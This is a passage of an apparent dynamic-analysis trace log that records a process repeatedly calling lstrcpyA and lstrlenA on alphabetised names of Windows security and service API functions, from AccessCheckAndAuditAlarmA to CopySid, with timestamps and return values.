returned="AccessCheckAndAuditAlarmA" [0030.830] lstrlenA (lpString="ACCESSCHECKANDAUDITALARMA") returned 25 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckAndAuditAlarmW" | out: lpString1="AccessCheckAndAuditAlarmW") returned="AccessCheckAndAuditAlarmW" [0030.830] lstrlenA (lpString="ACCESSCHECKANDAUDITALARMW") returned 25 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckByType" | out: lpString1="AccessCheckByType") returned="AccessCheckByType" [0030.830] lstrlenA (lpString="ACCESSCHECKBYTYPE") returned 17 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckByTypeAndAuditAlarmA" | out: lpString1="AccessCheckByTypeAndAuditAlarmA") returned="AccessCheckByTypeAndAuditAlarmA" [0030.830] lstrlenA (lpString="ACCESSCHECKBYTYPEANDAUDITALARMA") returned 31 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckByTypeAndAuditAlarmW" | out: lpString1="AccessCheckByTypeAndAuditAlarmW") returned="AccessCheckByTypeAndAuditAlarmW" [0030.830] lstrlenA (lpString="ACCESSCHECKBYTYPEANDAUDITALARMW") returned 31 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckByTypeResultList" | out: lpString1="AccessCheckByTypeResultList") returned="AccessCheckByTypeResultList" [0030.830] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLIST") returned 27 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckByTypeResultListAndAuditAlarmA" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmA") returned="AccessCheckByTypeResultListAndAuditAlarmA" [0030.830] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMA") returned 41 [0030.830] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned="AccessCheckByTypeResultListAndAuditAlarmByHandleA" [0030.830] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMBYHANDLEA") returned 49 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned="AccessCheckByTypeResultListAndAuditAlarmByHandleW" [0030.831] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMBYHANDLEW") returned 49 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AccessCheckByTypeResultListAndAuditAlarmW" | out: lpString1="AccessCheckByTypeResultListAndAuditAlarmW") returned="AccessCheckByTypeResultListAndAuditAlarmW" [0030.831] lstrlenA (lpString="ACCESSCHECKBYTYPERESULTLISTANDAUDITALARMW") returned 41 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAccessAllowedAce" | out: lpString1="AddAccessAllowedAce") returned="AddAccessAllowedAce" [0030.831] lstrlenA (lpString="ADDACCESSALLOWEDACE") returned 19 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAccessAllowedAceEx" | out: lpString1="AddAccessAllowedAceEx") returned="AddAccessAllowedAceEx" [0030.831] lstrlenA (lpString="ADDACCESSALLOWEDACEEX") returned 21 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAccessAllowedObjectAce" | out: lpString1="AddAccessAllowedObjectAce") returned="AddAccessAllowedObjectAce" [0030.831] lstrlenA (lpString="ADDACCESSALLOWEDOBJECTACE") returned 25 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAccessDeniedAce" | out: lpString1="AddAccessDeniedAce") returned="AddAccessDeniedAce" [0030.831] lstrlenA (lpString="ADDACCESSDENIEDACE") returned 18 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAccessDeniedAceEx" | out: lpString1="AddAccessDeniedAceEx") returned="AddAccessDeniedAceEx" [0030.831] lstrlenA (lpString="ADDACCESSDENIEDACEEX") returned 20 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAccessDeniedObjectAce" | out: lpString1="AddAccessDeniedObjectAce") returned="AddAccessDeniedObjectAce" [0030.831] lstrlenA (lpString="ADDACCESSDENIEDOBJECTACE") returned 24 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAce" | out: lpString1="AddAce") returned="AddAce" [0030.831] lstrlenA (lpString="ADDACE") returned 6 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAuditAccessAce" | out: lpString1="AddAuditAccessAce") returned="AddAuditAccessAce" [0030.831] lstrlenA (lpString="ADDAUDITACCESSACE") returned 17 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAuditAccessAceEx" | out: lpString1="AddAuditAccessAceEx") returned="AddAuditAccessAceEx" [0030.831] lstrlenA (lpString="ADDAUDITACCESSACEEX") returned 19 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddAuditAccessObjectAce" | out: lpString1="AddAuditAccessObjectAce") returned="AddAuditAccessObjectAce" [0030.831] lstrlenA (lpString="ADDAUDITACCESSOBJECTACE") returned 23 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddConditionalAce" | out: lpString1="AddConditionalAce") returned="AddConditionalAce" [0030.831] lstrlenA (lpString="ADDCONDITIONALACE") returned 17 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddMandatoryAce" | out: lpString1="AddMandatoryAce") returned="AddMandatoryAce" [0030.831] lstrlenA (lpString="ADDMANDATORYACE") returned 15 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddUsersToEncryptedFile" | out: lpString1="AddUsersToEncryptedFile") returned="AddUsersToEncryptedFile" [0030.831] lstrlenA (lpString="ADDUSERSTOENCRYPTEDFILE") returned 23 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AddUsersToEncryptedFileEx" | out: lpString1="AddUsersToEncryptedFileEx") returned="AddUsersToEncryptedFileEx" [0030.831] lstrlenA (lpString="ADDUSERSTOENCRYPTEDFILEEX") returned 25 [0030.831] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AdjustTokenGroups" | out: lpString1="AdjustTokenGroups") returned="AdjustTokenGroups" [0030.831] lstrlenA (lpString="ADJUSTTOKENGROUPS") returned 17 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AdjustTokenPrivileges" | out: lpString1="AdjustTokenPrivileges") returned="AdjustTokenPrivileges" [0030.832] lstrlenA (lpString="ADJUSTTOKENPRIVILEGES") returned 21 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AllocateAndInitializeSid" | out: lpString1="AllocateAndInitializeSid") returned="AllocateAndInitializeSid" [0030.832] lstrlenA (lpString="ALLOCATEANDINITIALIZESID") returned 24 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AllocateLocallyUniqueId" | out: lpString1="AllocateLocallyUniqueId") returned="AllocateLocallyUniqueId" [0030.832] lstrlenA (lpString="ALLOCATELOCALLYUNIQUEID") returned 23 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AreAllAccessesGranted" | out: lpString1="AreAllAccessesGranted") returned="AreAllAccessesGranted" [0030.832] lstrlenA (lpString="AREALLACCESSESGRANTED") returned 21 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AreAnyAccessesGranted" | out: lpString1="AreAnyAccessesGranted") returned="AreAnyAccessesGranted" [0030.832] lstrlenA (lpString="AREANYACCESSESGRANTED") returned 21 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditComputeEffectivePolicyBySid" | out: lpString1="AuditComputeEffectivePolicyBySid") returned="AuditComputeEffectivePolicyBySid" [0030.832] lstrlenA (lpString="AUDITCOMPUTEEFFECTIVEPOLICYBYSID") returned 32 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditComputeEffectivePolicyByToken" | out: lpString1="AuditComputeEffectivePolicyByToken") returned="AuditComputeEffectivePolicyByToken" [0030.832] lstrlenA (lpString="AUDITCOMPUTEEFFECTIVEPOLICYBYTOKEN") returned 34 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditEnumerateCategories" | out: lpString1="AuditEnumerateCategories") returned="AuditEnumerateCategories" [0030.832] lstrlenA (lpString="AUDITENUMERATECATEGORIES") returned 24 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditEnumeratePerUserPolicy" | out: lpString1="AuditEnumeratePerUserPolicy") returned="AuditEnumeratePerUserPolicy" [0030.832] lstrlenA (lpString="AUDITENUMERATEPERUSERPOLICY") returned 27 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditEnumerateSubCategories" | out: lpString1="AuditEnumerateSubCategories") returned="AuditEnumerateSubCategories" [0030.832] lstrlenA (lpString="AUDITENUMERATESUBCATEGORIES") returned 27 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditFree" | out: lpString1="AuditFree") returned="AuditFree" [0030.832] lstrlenA (lpString="AUDITFREE") returned 9 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditLookupCategoryGuidFromCategoryId" | out: lpString1="AuditLookupCategoryGuidFromCategoryId") returned="AuditLookupCategoryGuidFromCategoryId" [0030.832] lstrlenA (lpString="AUDITLOOKUPCATEGORYGUIDFROMCATEGORYID") returned 37 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditLookupCategoryIdFromCategoryGuid" | out: lpString1="AuditLookupCategoryIdFromCategoryGuid") returned="AuditLookupCategoryIdFromCategoryGuid" [0030.832] lstrlenA (lpString="AUDITLOOKUPCATEGORYIDFROMCATEGORYGUID") returned 37 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditLookupCategoryNameA" | out: lpString1="AuditLookupCategoryNameA") returned="AuditLookupCategoryNameA" [0030.832] lstrlenA (lpString="AUDITLOOKUPCATEGORYNAMEA") returned 24 [0030.832] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditLookupCategoryNameW" | out: lpString1="AuditLookupCategoryNameW") returned="AuditLookupCategoryNameW" [0030.832] lstrlenA (lpString="AUDITLOOKUPCATEGORYNAMEW") returned 24 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditLookupSubCategoryNameA" | out: lpString1="AuditLookupSubCategoryNameA") returned="AuditLookupSubCategoryNameA" [0030.833] lstrlenA (lpString="AUDITLOOKUPSUBCATEGORYNAMEA") returned 27 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditLookupSubCategoryNameW" | out: lpString1="AuditLookupSubCategoryNameW") returned="AuditLookupSubCategoryNameW" [0030.833] lstrlenA (lpString="AUDITLOOKUPSUBCATEGORYNAMEW") returned 27 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditQueryGlobalSaclA" | out: lpString1="AuditQueryGlobalSaclA") returned="AuditQueryGlobalSaclA" [0030.833] lstrlenA (lpString="AUDITQUERYGLOBALSACLA") returned 21 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditQueryGlobalSaclW" | out: lpString1="AuditQueryGlobalSaclW") returned="AuditQueryGlobalSaclW" [0030.833] lstrlenA (lpString="AUDITQUERYGLOBALSACLW") returned 21 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditQueryPerUserPolicy" | out: lpString1="AuditQueryPerUserPolicy") returned="AuditQueryPerUserPolicy" [0030.833] lstrlenA (lpString="AUDITQUERYPERUSERPOLICY") returned 23 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditQuerySecurity" | out: lpString1="AuditQuerySecurity") returned="AuditQuerySecurity" [0030.833] lstrlenA (lpString="AUDITQUERYSECURITY") returned 18 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditQuerySystemPolicy" | out: lpString1="AuditQuerySystemPolicy") returned="AuditQuerySystemPolicy" [0030.833] lstrlenA (lpString="AUDITQUERYSYSTEMPOLICY") returned 22 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditSetGlobalSaclA" | out: lpString1="AuditSetGlobalSaclA") returned="AuditSetGlobalSaclA" [0030.833] lstrlenA (lpString="AUDITSETGLOBALSACLA") returned 19 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditSetGlobalSaclW" | out: lpString1="AuditSetGlobalSaclW") returned="AuditSetGlobalSaclW" [0030.833] lstrlenA (lpString="AUDITSETGLOBALSACLW") returned 19 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditSetPerUserPolicy" | out: lpString1="AuditSetPerUserPolicy") returned="AuditSetPerUserPolicy" [0030.833] lstrlenA (lpString="AUDITSETPERUSERPOLICY") returned 21 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditSetSecurity" | out: lpString1="AuditSetSecurity") returned="AuditSetSecurity" [0030.833] lstrlenA (lpString="AUDITSETSECURITY") returned 16 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="AuditSetSystemPolicy" | out: lpString1="AuditSetSystemPolicy") returned="AuditSetSystemPolicy" [0030.833] lstrlenA (lpString="AUDITSETSYSTEMPOLICY") returned 20 [0030.833] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BackupEventLogA" | out: lpString1="BackupEventLogA") returned="BackupEventLogA" [0030.833] lstrlenA (lpString="BACKUPEVENTLOGA") returned 15 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BackupEventLogW" | out: lpString1="BackupEventLogW") returned="BackupEventLogW" [0030.834] lstrlenA (lpString="BACKUPEVENTLOGW") returned 15 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildExplicitAccessWithNameA" | out: lpString1="BuildExplicitAccessWithNameA") returned="BuildExplicitAccessWithNameA" [0030.834] lstrlenA (lpString="BUILDEXPLICITACCESSWITHNAMEA") returned 28 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildExplicitAccessWithNameW" | out: lpString1="BuildExplicitAccessWithNameW") returned="BuildExplicitAccessWithNameW" [0030.834] lstrlenA (lpString="BUILDEXPLICITACCESSWITHNAMEW") returned 28 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildImpersonateExplicitAccessWithNameA" | out: lpString1="BuildImpersonateExplicitAccessWithNameA") returned="BuildImpersonateExplicitAccessWithNameA" [0030.834] lstrlenA (lpString="BUILDIMPERSONATEEXPLICITACCESSWITHNAMEA") returned 39 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildImpersonateExplicitAccessWithNameW" | out: lpString1="BuildImpersonateExplicitAccessWithNameW") returned="BuildImpersonateExplicitAccessWithNameW" [0030.834] lstrlenA (lpString="BUILDIMPERSONATEEXPLICITACCESSWITHNAMEW") returned 39 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildImpersonateTrusteeA" | out: lpString1="BuildImpersonateTrusteeA") returned="BuildImpersonateTrusteeA" [0030.834] lstrlenA (lpString="BUILDIMPERSONATETRUSTEEA") returned 24 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildImpersonateTrusteeW" | out: lpString1="BuildImpersonateTrusteeW") returned="BuildImpersonateTrusteeW" [0030.834] lstrlenA (lpString="BUILDIMPERSONATETRUSTEEW") returned 24 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildSecurityDescriptorA" | out: lpString1="BuildSecurityDescriptorA") returned="BuildSecurityDescriptorA" [0030.834] lstrlenA (lpString="BUILDSECURITYDESCRIPTORA") returned 24 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildSecurityDescriptorW" | out: lpString1="BuildSecurityDescriptorW") returned="BuildSecurityDescriptorW" [0030.834] lstrlenA (lpString="BUILDSECURITYDESCRIPTORW") returned 24 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildTrusteeWithNameA" | out: lpString1="BuildTrusteeWithNameA") returned="BuildTrusteeWithNameA" [0030.834] lstrlenA (lpString="BUILDTRUSTEEWITHNAMEA") returned 21 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildTrusteeWithNameW" | out: lpString1="BuildTrusteeWithNameW") returned="BuildTrusteeWithNameW" [0030.834] lstrlenA (lpString="BUILDTRUSTEEWITHNAMEW") returned 21 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildTrusteeWithObjectsAndNameA" | out: lpString1="BuildTrusteeWithObjectsAndNameA") returned="BuildTrusteeWithObjectsAndNameA" [0030.834] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDNAMEA") returned 31 [0030.834] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildTrusteeWithObjectsAndNameW" | out: lpString1="BuildTrusteeWithObjectsAndNameW") returned="BuildTrusteeWithObjectsAndNameW" [0030.834] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDNAMEW") returned 31 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildTrusteeWithObjectsAndSidA" | out: lpString1="BuildTrusteeWithObjectsAndSidA") returned="BuildTrusteeWithObjectsAndSidA" [0030.835] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDSIDA") returned 30 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildTrusteeWithObjectsAndSidW" | out: lpString1="BuildTrusteeWithObjectsAndSidW") returned="BuildTrusteeWithObjectsAndSidW" [0030.835] lstrlenA (lpString="BUILDTRUSTEEWITHOBJECTSANDSIDW") returned 30 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildTrusteeWithSidA" | out: lpString1="BuildTrusteeWithSidA") returned="BuildTrusteeWithSidA" [0030.835] lstrlenA (lpString="BUILDTRUSTEEWITHSIDA") returned 20 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="BuildTrusteeWithSidW" | out: lpString1="BuildTrusteeWithSidW") returned="BuildTrusteeWithSidW" [0030.835] lstrlenA (lpString="BUILDTRUSTEEWITHSIDW") returned 20 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CancelOverlappedAccess" | out: lpString1="CancelOverlappedAccess") returned="CancelOverlappedAccess" [0030.835] lstrlenA (lpString="CANCELOVERLAPPEDACCESS") returned 22 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ChangeServiceConfig2A" | out: lpString1="ChangeServiceConfig2A") returned="ChangeServiceConfig2A" [0030.835] lstrlenA (lpString="CHANGESERVICECONFIG2A") returned 21 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ChangeServiceConfig2W" | out: lpString1="ChangeServiceConfig2W") returned="ChangeServiceConfig2W" [0030.835] lstrlenA (lpString="CHANGESERVICECONFIG2W") returned 21 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ChangeServiceConfigA" | out: lpString1="ChangeServiceConfigA") returned="ChangeServiceConfigA" [0030.835] lstrlenA (lpString="CHANGESERVICECONFIGA") returned 20 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ChangeServiceConfigW" | out: lpString1="ChangeServiceConfigW") returned="ChangeServiceConfigW" [0030.835] lstrlenA (lpString="CHANGESERVICECONFIGW") returned 20 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CheckTokenMembership" | out: lpString1="CheckTokenMembership") returned="CheckTokenMembership" [0030.835] lstrlenA (lpString="CHECKTOKENMEMBERSHIP") returned 20 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ClearEventLogA" | out: lpString1="ClearEventLogA") returned="ClearEventLogA" [0030.835] lstrlenA (lpString="CLEAREVENTLOGA") returned 14 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ClearEventLogW" | out: lpString1="ClearEventLogW") returned="ClearEventLogW" [0030.835] lstrlenA (lpString="CLEAREVENTLOGW") returned 14 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseCodeAuthzLevel" | out: lpString1="CloseCodeAuthzLevel") returned="CloseCodeAuthzLevel" [0030.835] lstrlenA (lpString="CLOSECODEAUTHZLEVEL") returned 19 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseEncryptedFileRaw" | out: lpString1="CloseEncryptedFileRaw") returned="CloseEncryptedFileRaw" [0030.835] lstrlenA (lpString="CLOSEENCRYPTEDFILERAW") returned 21 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseEventLog" | out: lpString1="CloseEventLog") returned="CloseEventLog" [0030.835] lstrlenA (lpString="CLOSEEVENTLOG") returned 13 [0030.835] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseServiceHandle" | out: lpString1="CloseServiceHandle") returned="CloseServiceHandle" [0030.835] lstrlenA (lpString="CLOSESERVICEHANDLE") returned 18 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseThreadWaitChainSession" | out: lpString1="CloseThreadWaitChainSession") returned="CloseThreadWaitChainSession" [0030.836] lstrlenA (lpString="CLOSETHREADWAITCHAINSESSION") returned 27 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CloseTrace" | out: lpString1="CloseTrace") returned="CloseTrace" [0030.836] lstrlenA (lpString="CLOSETRACE") returned 10 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CommandLineFromMsiDescriptor" | out: lpString1="CommandLineFromMsiDescriptor") returned="CommandLineFromMsiDescriptor" [0030.836] lstrlenA (lpString="COMMANDLINEFROMMSIDESCRIPTOR") returned 28 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ComputeAccessTokenFromCodeAuthzLevel" | out: lpString1="ComputeAccessTokenFromCodeAuthzLevel") returned="ComputeAccessTokenFromCodeAuthzLevel" [0030.836] lstrlenA (lpString="COMPUTEACCESSTOKENFROMCODEAUTHZLEVEL") returned 36 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ControlService" | out: lpString1="ControlService") returned="ControlService" [0030.836] lstrlenA (lpString="CONTROLSERVICE") returned 14 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ControlServiceExA" | out: lpString1="ControlServiceExA") returned="ControlServiceExA" [0030.836] lstrlenA (lpString="CONTROLSERVICEEXA") returned 17 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ControlServiceExW" | out: lpString1="ControlServiceExW") returned="ControlServiceExW" [0030.836] lstrlenA (lpString="CONTROLSERVICEEXW") returned 17 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ControlTraceA" | out: lpString1="ControlTraceA") returned="ControlTraceA" [0030.836] lstrlenA (lpString="CONTROLTRACEA") returned 13 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ControlTraceW" | out: lpString1="ControlTraceW") returned="ControlTraceW" [0030.836] lstrlenA (lpString="CONTROLTRACEW") returned 13 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertAccessToSecurityDescriptorA" | out: lpString1="ConvertAccessToSecurityDescriptorA") returned="ConvertAccessToSecurityDescriptorA" [0030.836] lstrlenA (lpString="CONVERTACCESSTOSECURITYDESCRIPTORA") returned 34 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertAccessToSecurityDescriptorW" | out: lpString1="ConvertAccessToSecurityDescriptorW") returned="ConvertAccessToSecurityDescriptorW" [0030.836] lstrlenA (lpString="CONVERTACCESSTOSECURITYDESCRIPTORW") returned 34 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSDToStringSDRootDomainA" | out: lpString1="ConvertSDToStringSDRootDomainA") returned="ConvertSDToStringSDRootDomainA" [0030.836] lstrlenA (lpString="CONVERTSDTOSTRINGSDROOTDOMAINA") returned 30 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSDToStringSDRootDomainW" | out: lpString1="ConvertSDToStringSDRootDomainW") returned="ConvertSDToStringSDRootDomainW" [0030.836] lstrlenA (lpString="CONVERTSDTOSTRINGSDROOTDOMAINW") returned 30 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSecurityDescriptorToAccessA" | out: lpString1="ConvertSecurityDescriptorToAccessA") returned="ConvertSecurityDescriptorToAccessA" [0030.836] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSA") returned 34 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSecurityDescriptorToAccessNamedA" | out: lpString1="ConvertSecurityDescriptorToAccessNamedA") returned="ConvertSecurityDescriptorToAccessNamedA" [0030.836] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSNAMEDA") returned 39 [0030.836] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSecurityDescriptorToAccessNamedW" | out: lpString1="ConvertSecurityDescriptorToAccessNamedW") returned="ConvertSecurityDescriptorToAccessNamedW" [0030.836] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSNAMEDW") returned 39 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSecurityDescriptorToAccessW" | out: lpString1="ConvertSecurityDescriptorToAccessW") returned="ConvertSecurityDescriptorToAccessW" [0030.837] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOACCESSW") returned 34 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSecurityDescriptorToStringSecurityDescriptorA" | out: lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorA") returned="ConvertSecurityDescriptorToStringSecurityDescriptorA" [0030.837] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOSTRINGSECURITYDESCRIPTORA") returned 52 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSecurityDescriptorToStringSecurityDescriptorW" | out: lpString1="ConvertSecurityDescriptorToStringSecurityDescriptorW") returned="ConvertSecurityDescriptorToStringSecurityDescriptorW" [0030.837] lstrlenA (lpString="CONVERTSECURITYDESCRIPTORTOSTRINGSECURITYDESCRIPTORW") returned 52 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSidToStringSidA" | out: lpString1="ConvertSidToStringSidA") returned="ConvertSidToStringSidA" [0030.837] lstrlenA (lpString="CONVERTSIDTOSTRINGSIDA") returned 22 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertSidToStringSidW" | out: lpString1="ConvertSidToStringSidW") returned="ConvertSidToStringSidW" [0030.837] lstrlenA (lpString="CONVERTSIDTOSTRINGSIDW") returned 22 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertStringSDToSDDomainA" | out: lpString1="ConvertStringSDToSDDomainA") returned="ConvertStringSDToSDDomainA" [0030.837] lstrlenA (lpString="CONVERTSTRINGSDTOSDDOMAINA") returned 26 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertStringSDToSDDomainW" | out: lpString1="ConvertStringSDToSDDomainW") returned="ConvertStringSDToSDDomainW" [0030.837] lstrlenA (lpString="CONVERTSTRINGSDTOSDDOMAINW") returned 26 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertStringSDToSDRootDomainA" | out: lpString1="ConvertStringSDToSDRootDomainA") returned="ConvertStringSDToSDRootDomainA" [0030.837] lstrlenA (lpString="CONVERTSTRINGSDTOSDROOTDOMAINA") returned 30 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertStringSDToSDRootDomainW" | out: lpString1="ConvertStringSDToSDRootDomainW") returned="ConvertStringSDToSDRootDomainW" [0030.837] lstrlenA (lpString="CONVERTSTRINGSDTOSDROOTDOMAINW") returned 30 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertStringSecurityDescriptorToSecurityDescriptorA" | out: lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned="ConvertStringSecurityDescriptorToSecurityDescriptorA" [0030.837] lstrlenA (lpString="CONVERTSTRINGSECURITYDESCRIPTORTOSECURITYDESCRIPTORA") returned 52 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertStringSecurityDescriptorToSecurityDescriptorW" | out: lpString1="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned="ConvertStringSecurityDescriptorToSecurityDescriptorW" [0030.837] lstrlenA (lpString="CONVERTSTRINGSECURITYDESCRIPTORTOSECURITYDESCRIPTORW") returned 52 [0030.837] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertStringSidToSidA" | out: lpString1="ConvertStringSidToSidA") returned="ConvertStringSidToSidA" [0030.838] lstrlenA (lpString="CONVERTSTRINGSIDTOSIDA") returned 22 [0030.838] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertStringSidToSidW" | out: lpString1="ConvertStringSidToSidW") returned="ConvertStringSidToSidW" [0030.838] lstrlenA (lpString="CONVERTSTRINGSIDTOSIDW") returned 22 [0030.838] lstrcpyA (in: lpString1=0xc9dc50, lpString2="ConvertToAutoInheritPrivateObjectSecurity" | out: lpString1="ConvertToAutoInheritPrivateObjectSecurity") returned="ConvertToAutoInheritPrivateObjectSecurity" [0030.838] lstrlenA (lpString="CONVERTTOAUTOINHERITPRIVATEOBJECTSECURITY") returned 41 [0030.838] lstrcpyA (in: lpString1=0xc9dc50, lpString2="CopySid" | out: lpString1="CopySid") returned="CopySid" [0030.838] lstrlenA 